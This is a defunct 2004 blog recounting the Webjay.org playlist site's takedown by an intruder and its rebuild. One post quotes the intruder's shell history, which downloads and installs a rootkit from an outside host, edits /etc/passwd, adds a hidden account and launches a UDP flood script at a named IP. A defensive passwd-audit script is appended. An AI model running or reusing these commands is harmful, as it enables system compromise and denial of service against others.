Tuesday, December 07, 2004
Afterlife of this blog
You are reading a defunct weblog. This weblog was created to stand in for the Webjay.org web site when it was totalled by a cracker. During that time the webjay.org domain forwarded to here, where users could get news about progress towards reopening the site.
But no longer.
If you are reading this, you must not have gone through the forwarding address. In that case, there is no here here.
Monday, December 06, 2004
BACK FROM THE DEAD -jay
We're flipping the switch to put Webjay back online. It will take about a half day for the change to reach every ISP, so if you see this page instead of webjay.org, stop back in a little while.
In the meantime, let's celebrate:
Friday, December 03, 2004
Re-opening Monday
The code is good to go, so the next thing is a couple of days' worth of security work.
Grand re-opening date: Monday.
Starfrosch playlist
Markus Koller's hand-made M3U (hosted on gonze.com/playlists per my offer the other day) is rocking my apartment block. Markus, my neighbors are cursing you as I write this.
Doing it by hand is primitive but fun. Any more?
Update #1: Brett, aka webjaybs, posted more handmade playlists here:
- http://brettsinger.net/projects/blog/temp/playlists/
- http://www.brettsinger.net/projects/playlists/olderplaylists.html
Update #2: Actually, there's no need to email me the list of song URLs. Just post them in a comment and I'll make an M3U.
Thursday, December 02, 2004
Testers wanted
Almost everything is now running, and the bugs are getting smaller and smaller, so it's time to bring in more eyeballs. There are two criteria for people who want to do testing:
1) You have to be technical enough to convince your machine that webjay.org is on the IP address I will give you. On a Unix box this means editing /etc/hosts, on a Mac it means using NetInfo, on a Windows machine it means something I don't know.
2) You have to be known to me already, since the new layer of security isn't ready yet.
Send an email to lucas@gonze.com. (webjay.org email isn't up yet.)
Kewl
Forums are up.
Wednesday, December 01, 2004
Rosie the 'lister says...
Courtesy P. Harper:
Lemme tell you, I'm cursing like a sailor while I work on the rebuild. Anyway, if you're really jonesing there is a thing you can do. Back before webjay bootstrapped, Brett, Jim and myself were making playlists manually. What you do is make a file entitled playlistname.m3u with a bunch of URLs of songs in it, then put the file in a directory which is set up with the right mime types. gonze.com/playlists was set up for this, and it still is, so if you email me a .m3u file I'll copy it over there and post a pointer here.
For historical interest, the first really good playlist was Work, which you can still see (and maybe even listen to).
Knock knock
Our friend from Brazil came knocking again. In the log of denied IP
addresses we have these:
200.175.27.55.dialup.gvt.net.br
201-1-138-30.dsl.telesp.net.br
What a creepy experience. It's like hearing noises in the night and
knowing for a fact that it's a burglar.
Tuesday, November 30, 2004
Status November 30
The last backed-up version is now running on the new server and I'm in the process of merging in the freshest data and code. All together, the new version is up but in a very buggy state.
Monday, November 29, 2004
Cracker footsteps
Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.
cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages
Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
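The history above shows /etc/passwd being edited twice and an account named crond being created with its home directory at /dev/crond. As an added example (not part of the original post and not Webjay's code), this script audits a passwd-format file for entries of that kind. The sample data and the svc account are constructed, and the extra UID 0 check is a general post-incident check rather than something the history proves was done.

```shell
#!/bin/sh
# Constructed sample in /etc/passwd format (not data from the incident).
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
ftp:x:14:50:FTP User:/dev/null:/sbin/nologin
crond:x:501:501::/dev/crond:/bin/bash
svc:x:0:0::/root:/bin/bash
alice:x:500:500::/home/alice:/bin/bash
EOF
}

# audit_passwd [FILE]: print one "reason:name:uid:home:shell" line per
# finding. FILE defaults to /etc/passwd.
audit_passwd() {
    awk -F: '
        /^#/ || NF == 0 { next }                      # comments, blank lines
        NF != 7 { print "malformed-line:" NR; next }  # hand-edited damage
        {
            # A home directory inside /dev or /proc hides files among
            # device nodes. /dev/null itself is a common, harmless home
            # for service accounts, so it is not reported.
            if ($6 ~ /^\/(dev|proc)\// && $6 != "/dev/null")
                print "home-in-pseudo-fs:" $1 ":" $3 ":" $6 ":" $7
            # Any UID 0 account other than root is a second root login.
            if ($3 == 0 && $1 != "root")
                print "extra-uid0:" $1 ":" $3 ":" $6 ":" $7
        }
    ' "${1:-/etc/passwd}"
}

# Demo on the constructed sample.
tmp=$(mktemp) && sample_passwd > "$tmp" && audit_passwd "$tmp"
rm -f "$tmp"
```

On a machine that may be compromised, run the audit against a copy of the passwd file from trusted media, since the installed awk and cat may themselves have been replaced.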
Prognosis
The database looks fine, so playlists and user accounts should be in good shape.
There are two backups of the code, a fairly old one which holds everything and a fresh one which holds only a few critical modules. These two different snapshots will have to be knitted together, which means that bugs will crop up during the first 1-2 days back up. Also, bugs fixed in the older backup will have to be refound and refixed.
My guess for how long the work will take is a few days at the least, a week at the most.